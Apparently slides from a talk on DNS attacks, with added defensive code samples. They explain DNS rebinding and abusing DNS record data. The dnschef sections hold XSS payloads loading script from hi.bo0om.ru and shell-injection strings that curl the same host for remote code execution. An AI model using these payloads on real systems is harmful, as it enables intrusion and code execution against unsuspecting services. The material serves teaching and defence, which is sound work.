3. What is DNS?
The Domain Name System (DNS) is a
hierarchical decentralized naming system for
computers, services, or any resource
connected to the Internet or a private network.
It associates various information with domain
names assigned to each of the participating
entities. Most prominently, it translates more
readily memorized domain names to the
numerical IP addresses needed for the
purpose of locating and identifying computer
services and devices with the underlying
network protocols. By providing a worldwide,
distributed directory service, the Domain Name
System is an essential component of the
functionality of the Internet.
11. What is SOP?
In computing, the same-origin policy is an
important concept in the web application
security model. Under the policy, a web
browser permits scripts contained in a first
web page to access data in a second web
page, but only if both web pages have the
same origin. An origin is defined as a
combination of URI scheme, hostname,
and port number. This policy prevents a
malicious script on one page from
obtaining access to sensitive data on
another web page through that page's
Document Object Model.
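To make the origin tuple concrete, the following is an added example (not part of the original slides) that computes the scheme/host/port origin of two URLs with the WHATWG URL parser available in browsers and Node.js and reports which component blocks access. The URLs in it are constructed samples.

```javascript
// Added example (not part of the original slides): the comparison the
// same-origin policy performs, written out so the three-part origin tuple
// (scheme, host, port) is visible.  Uses the WHATWG URL parser that browsers
// and Node.js provide.

function originOf(urlString) {
  const u = new URL(urlString);
  // The parser lowercases scheme and host and drops a scheme's default port,
  // so "http://a.example:80" and "http://a.example" yield the same tuple.
  return { scheme: u.protocol.slice(0, -1), host: u.hostname, port: u.port };
}

// Returns "same origin" or names the first component that differs.
function sopVerdict(first, second) {
  const a = originOf(first), b = originOf(second);
  if (a.scheme !== b.scheme) return `blocked: scheme ${a.scheme} vs ${b.scheme}`;
  if (a.host !== b.host) return `blocked: host ${a.host} vs ${b.host}`;
  if (a.port !== b.port) {
    return `blocked: port ${a.port || "default"} vs ${b.port || "default"}`;
  }
  return "same origin";
}

function isSameOrigin(first, second) {
  return sopVerdict(first, second) === "same origin";
}

// Constructed pairs: a page at the first URL running a script that tries to
// read the DOM of a frame loaded from the second URL.
const CASES = [
  ["http://example.com/page", "http://example.com:80/other?x=1"], // path, query ignored
  ["http://example.com/page", "https://example.com/page"],         // scheme differs
  ["http://example.com/page", "http://api.example.com/page"],      // subdomain = other host
  ["http://example.com/page", "http://example.com:8080/page"],     // port differs
];

function report() {
  return CASES.map(([a, b]) => sopVerdict(a, b));
}

if (typeof require !== "undefined" && require.main === module) {
  CASES.forEach(([a, b]) => console.log(`${a} -> ${b}: ${sopVerdict(a, b)}`));
}
```

The first pair is the one people most often get wrong: an explicit default port and a different path or query string do not change the origin, while a subdomain does.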
14. https://crypto.stanford.edu/dns/dns-rebinding.pdf
https://www.ptsecurity.com/download/DNS-rebinding.pdf
The resulting attack consists of the following steps:
1. The victim addresses the dns.evil.xxx domain.
2. The attacker’s DNS server returns both IP addresses in the fixed order.
3. The browser redirects the request to the server at the external 97.246.251.93 IP address.
4. The server returns an HTML page containing JavaScript.
5. After the browser downloads the page, the client’s JavaScript sends a request to the dns.evil.xxx domain.
6. After the request is received, the server script blocks the incoming connections with the victim’s IP address.
7. After a while, the client’s script re-addresses the dns.attacker.ru domain. Since the server returns RST from the 97.246.251.93 IP address, the request is redirected to the local server at 192.168.0.1.
Now the JavaScript is able to send any GET/POST/HEAD requests to an application at 97.246.251.93, as well as process the received responses and send the results to the attacker.
26. Dnschef
[NS] # Queries for name server records
*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?ns></script>
[MX] # Queries for mail server records
*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?cname></script>
[CNAME] # Queries for alias records
*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?cname></script>
http://thesprawl.org/projects/dnschef/
34. Dnschef
[NS] # Queries for name server records
*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'
[MX] # Queries for mail server records
*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'
[CNAME] # Queries for alias records
*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'
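Both dnschef configurations above work for the same reason: the tool that looks up the NS/MX/CNAME record trusts the target name it gets back and either reflects it into HTML unescaped (the XSS case) or passes it through a shell (the RCE case). The following is an added example, not part of the slides, the referenced paper or dnschef, of how a consumer of DNS data should treat a record target: validate it against hostname syntax, escape it when rendering, and build any follow-up command as an argv list with no shell. The sample records, the `example.test` names and the `dig` invocation are constructed for the example.

```python
"""Added example (not part of the original slides, the referenced paper or
dnschef): defensive handling of DNS record data before it is reflected into
HTML or used in a command.  Record values below are constructed samples."""
import html
import re
import subprocess

# RFC 1123 hostname grammar for record targets: labels of 1-63 letters,
# digits or hyphens, no leading or trailing hyphen, whole name at most 253
# characters.  (Owner names such as _dmarc.example follow a looser grammar.)
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_hostname(name: str) -> bool:
    """True only for a syntactically valid hostname; the HTML and shell
    metacharacters used in the slides' payloads are all rejected here."""
    name = name.rstrip(".")  # a single trailing dot marks an absolute name
    if not name or len(name) > 253:
        return False
    return all(_LABEL.match(label) for label in name.split("."))


def render_record(rtype: str, owner: str, target: str) -> str:
    """One HTML table row for a lookup result.  The target is validated and
    every cell is escaped, so record data can never close the attribute or
    element it is rendered inside."""
    if not is_valid_hostname(target):
        target = "[invalid record data]"
    cells = (html.escape(rtype), html.escape(owner), html.escape(target))
    return "<tr><td>{}</td><td>{}</td><td>{}</td></tr>".format(*cells)


def build_lookup_argv(target: str, rtype: str = "A") -> list:
    """argv for a follow-up lookup of a record target with dig.  The name is
    validated first and the list form never involves a shell, so $(...),
    backticks and & in a malicious target are inert text."""
    if not is_valid_hostname(target):
        raise ValueError(f"refusing to look up malformed name: {target!r}")
    if not re.fullmatch(r"[A-Z]{1,10}", rtype):
        raise ValueError(f"unexpected record type: {rtype!r}")
    return ["dig", "+short", target, rtype]


def run_lookup(target: str, rtype: str = "A") -> str:
    """Runs the lookup without shell=True; needs dig installed to be useful."""
    argv = build_lookup_argv(target, rtype)
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout


# Constructed sample answers as a resolver might hand them back:
# (record type, owner name, record target).
SAMPLE_RECORDS = [
    ("NS", "example.test", "ns1.example.test."),
    ("MX", "example.test", "mail.example.test"),
    ("CNAME", "www.example.test", "\"><script>alert(1)</script>"),  # XSS-style target
    ("NS", "example.test", "ns$(id).example.test"),                 # injection-style target
]


def triage(records):
    """Splits records into rows safe to render and targets refused for lookup."""
    rows, refused = [], []
    for rtype, owner, target in records:
        rows.append(render_record(rtype, owner, target))
        try:
            build_lookup_argv(target)
        except ValueError:
            refused.append(target)
    return rows, refused


if __name__ == "__main__":
    rows, refused = triage(SAMPLE_RECORDS)
    print("\n".join(rows))
    print("refused for lookup:", refused)
```

The validation step is what matters most: escaping alone fixes the HTML sink, and `shell=False` alone fixes the command sink, but rejecting anything that is not a hostname closes both and every sink the tool grows later.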
1. The victim accesses a domain belonging to the attacker.
2. It receives from the DNS server the IP address corresponding to the domain name.
3. It connects to the web server at the received IP address and obtains a JavaScript script from it.
4. Some time after loading, the received JavaScript initiates a repeat request to the server.
5. At that moment the attacker, using a firewall, blocks all of the victim’s requests to the server.
6. The browser tries to learn the server’s IP address again by sending the corresponding DNS query, and this time receives the IP address of a vulnerable server on the victim’s local network.
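Both walk-throughs of the rebinding sequence (the seven steps under the paper links above and the six steps just given) can be broken at two points: the resolver can refuse to hand a browser a private address for a name outside the organisation's own zones, and the internal application can refuse a request whose Host header does not name it. The following is an added example, not from the slides or the referenced paper, that implements both checks; the first mirrors what dnsmasq's `--stop-dns-rebind` option does, the second is the Host validation an internal web application should perform itself. The addresses 97.246.251.93 and 192.168.0.1 and the name dns.evil.xxx are the slides' own; `corp.example` and the two HTTP requests are constructed placeholders.

```python
"""Added example (not from the original slides or paper): two checks that
each break the rebinding sequence above, one at the resolver and one in the
internal web application.  Zone names and requests are constructed."""
import ipaddress


def is_rebind_suspect(answer_ip: str) -> bool:
    """True when an answer points into address space the victim's browser
    can reach but the Internet cannot (the second address in the attack)."""
    try:
        ip = ipaddress.ip_address(answer_ip)
    except ValueError:
        return True  # unparsable answer data is not something to connect to
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved)


def _under_zone(qname: str, zones) -> bool:
    q = qname.rstrip(".").lower()
    return any(q == z or q.endswith("." + z)
               for z in (zone.rstrip(".").lower() for zone in zones))


def filter_answers(qname: str, answers, internal_zones=("corp.example",)):
    """Resolver-side: split answers into (accepted, dropped).  Names inside
    the organisation's own zones may resolve to private space; for any other
    name a private answer is dropped, so the browser never learns the
    internal address the attacker's server hands out."""
    if _under_zone(qname, internal_zones):
        return list(answers), []
    accepted, dropped = [], []
    for ip in answers:
        (dropped if is_rebind_suspect(ip) else accepted).append(ip)
    return accepted, dropped


def host_header_allowed(host_header: str, allowed_hosts, listen_port: int = 80) -> bool:
    """Server-side: accept only a Host value naming this application on the
    port it listens on.  (Bracketed IPv6 literals are not handled here.)"""
    host, _, port = host_header.strip().lower().partition(":")
    if port and port != str(listen_port):
        return False
    return host in {h.lower() for h in allowed_hosts}


def check_request(raw: bytes, allowed_hosts, listen_port: int = 80) -> str:
    """Parses the head of a raw HTTP/1.1 request and returns 'accept' or the
    reason for refusal.  After a rebinding the browser still sends the
    attacker's name in Host, which is exactly what this check catches."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    host = headers.get("host")
    if host is None:
        return "refuse: missing Host header"
    if not host_header_allowed(host, allowed_hosts, listen_port):
        return f"refuse: unexpected Host {host!r}"
    return "accept"


# Constructed requests as the local server at 192.168.0.1 would see them.
REBOUND_REQUEST = (b"GET /admin HTTP/1.1\r\nHost: dns.evil.xxx\r\n"
                   b"Origin: http://dns.evil.xxx\r\n\r\n")
DIRECT_REQUEST = b"GET /admin HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n"

if __name__ == "__main__":
    # The attacker's server answers both addresses from step 2 in order;
    # the private one is the one the resolver should refuse to pass on.
    print(filter_answers("dns.evil.xxx", ["97.246.251.93", "192.168.0.1"]))
    for req in (REBOUND_REQUEST, DIRECT_REQUEST):
        print(check_request(req, {"192.168.0.1"}))
```

The Host check is the one that survives regardless of which resolver the victim uses, and a refused request with a foreign Host value arriving at an internal address is also a useful detection signal in the application's logs.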